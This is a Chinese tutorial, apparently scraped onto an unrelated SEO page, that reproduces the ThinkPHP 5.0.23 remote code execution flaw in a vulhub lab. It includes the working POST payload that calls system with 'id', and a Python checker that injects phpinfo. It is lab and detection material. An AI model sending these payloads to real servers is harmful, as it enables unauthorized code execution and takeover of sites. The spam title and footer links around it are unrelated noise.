当前位置: 首页 > news >正文

在百度做网站邯郸做网站费用

在百度做网站,邯郸做网站费用,建站小二,设计公司推广渠道Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现#xff08;六十四#xff09; 漏洞环境搭建 这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装#xff0c;我们进入 ThinkPHP漏洞环境#xff0c;可以 cd ThinkPHP#xff0c;然…Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现六十四 漏洞环境搭建 这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装我们进入 ThinkPHP漏洞环境可以 cd ThinkPHP然后通过 ls 查看可以搭建的靶场目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。我们拿 5.0.23-rce 漏洞举例如果我们想要安装 5.0.23-rce 漏洞环境可以 cd 到 5.0.23-rce 然后输入以下命令启动靶场环境 docker-compose up -d然后我们在浏览器输入 https://localhost:8081就可以访问靶场环境 ThinkPHP5.0.23-RCE漏洞原理 ThinkPHP5.0.23-RCE漏洞是一种远程代码执行漏洞存在于ThinkPHP框架的5.0.23版本及之前的版本中。该漏洞的原理是在TP5的路由解析过程中由于未对用户输入进行足够的过滤导致恶意用户可以构造特定的URL请求来执行任意的PHP代码。 具体来说漏洞的原理如下 在TP5中路由解析过程中会将URL中的参数进行解析并根据解析结果调用相应的控制器方法。 在解析URL参数时TP5通过分析URL中的冒号:和斜杠/来确定控制器和方法的名称。 由于未对用户输入进行足够的过滤恶意用户可以通过在URL中注入特定的代码来构造恶意请求。 恶意用户可以通过在URL中使用特殊字符如冒号和斜杠来改变URL参数的解析结果从而执行任意的PHP代码。 当恶意用户构造的恶意请求被TP5解析时解析结果可能会将恶意代码作为控制器或方法的名称导致恶意代码被执行。 通过利用这个漏洞攻击者可以执行任意的PHP代码包括但不限于删除、修改、上传文件等恶意操作进而对系统进行攻击或者获取系统敏感信息。 其POC如下所示 url:/index.php?scaptcha _method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]id ThinkPHP 5.0.23-RCE漏洞POC 接下来我们给出ThinkPHP 5.0.23-RCE漏洞的POC代码内容如下 POST /index.php?scaptcha HTTP/1.1 Host: host:8081 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 72_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]id我们通过BP抓包发送数据得到相应的回显。 ThinkPHP 5.0.23-RCE漏洞POC编写 现在我们用python编写检测ThinkPHP 5.0.23-RCE漏洞的代码内容如下 #!/usr/bin/env pythonimport requests from urllib.parse import urljoin # from bs4 import BeautifulSoupdef thinkphp_5023_rce(url):# url url/index.php?scaptcha# print(url)# payload r_method__constructfilter[]phpinfomethodgetserver[REQUEST_METHOD]1# headers {# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0,# Content-Type: application/x-www-form-urlencoded,# }payload {_method:__construct,filter[]:phpinfo,method:get,server[REQUEST_METHOD]:1}target urljoin(url,/index.php?scaptcha)# print(target)response requests.post(target,datapayload,verifyFalse)print(response.text)if PHP Version in response.text:print(漏洞存在)else:print(漏洞不存在)if __name__ __main__:url http://localhost:8081thinkphp_5023_rce(url) POC代码详细分析 这段代码是一个用于检测ThinkPHP 5.0.23版本远程代码执行漏洞的脚本。下面是对代码的分析 导入requests模块和urllib.parse模块的urljoin函数。定义了一个名为thinkphp_5023_rce的函数接受一个参数url作为目标网站的URL。构造了一个payload字典包含了需要发送的POST请求的参数。使用urljoin函数将目标网站的URL与特定的路径拼接成新的URL。使用requests.post发送POST请求将目标URL和payload作为参数设置verify为False表示不验证SSL证书。打印响应的文本内容。判断响应的文本内容中是否包含PHP Version如果包含则表示漏洞存在否则表示漏洞不存在。在主函数中指定目标网站的URL并调用thinkphp_5023_rce函数。 该代码是一个简单的脚本用于检测ThinkPHP 5.0.23版本存在的远程代码执行漏洞。它发送一个POST请求并检查响应的文本内容中是否包含特定的关键字来确定漏洞是否存在。 运行效果图 如下是我们这串代码的实际运行效果图
http://www.zqtcl.cn/news/711316/

相关文章:

  • 网站套餐可以分摊吗吗移动登录网页模板免费下载
  • asp网站会员注册不了但是打不开网页
  • wordpress 中文网店杭州排名优化公司
  • wordpress建站安全吗wordpress企业主题教程
  • 网站构建的开发费用信息管理系统网站开发教程
  • 自己做网站怎么维护wordpress素材模板
  • 如何选择一个好的优质网站建设公司wordpress 主题小工具
  • mysql数据库做网站广州网站seo地址
  • 福建省住房和城乡建设厅网站电话网站开发项目步骤
  • 网站注册域名多少钱淘宝网商城
  • 做架构图的网站网站和网店的区别
  • 做红包网站简单个人网站设计
  • 新手学做网站pdf手wordpress修改搜索框
  • 做湲兔费网站视颍如何通过查询网站注册时间
  • 重庆cms建站模板南通网站建设推广优化
  • 合肥网站建设的公司新闻类网站如何做量化统计
  • 好用的在线地图网站十六局集团门户网
  • 网站开发数据库连接失败广州网站建站平台
  • 鄂尔多斯北京网站建设加盟网站建设的内容
  • 网站 被 抄袭不属于营销型网站的特点
  • 浙江英文网站建设互联网公司排名2021完整版
  • 完美代码的网站python开发工具
  • 餐饮网站开发参考文献网站建设500错误代码
  • 网站开发关键技术网站自动推广软件免费
  • 前端学习网站南阳东莞网站建设公司哪家好
  • 关于做网站的了解点wordpress小程序插曲
  • PHP网站开发与管理设计心得个人可以做聊天网站备案吗
  • 开公司可以在哪些网站做推广上海画册设计
  • 成都高新区规划建设局网站网络营销方式有哪些?举例说明
  • 国家企业信用公信系统入口seo服务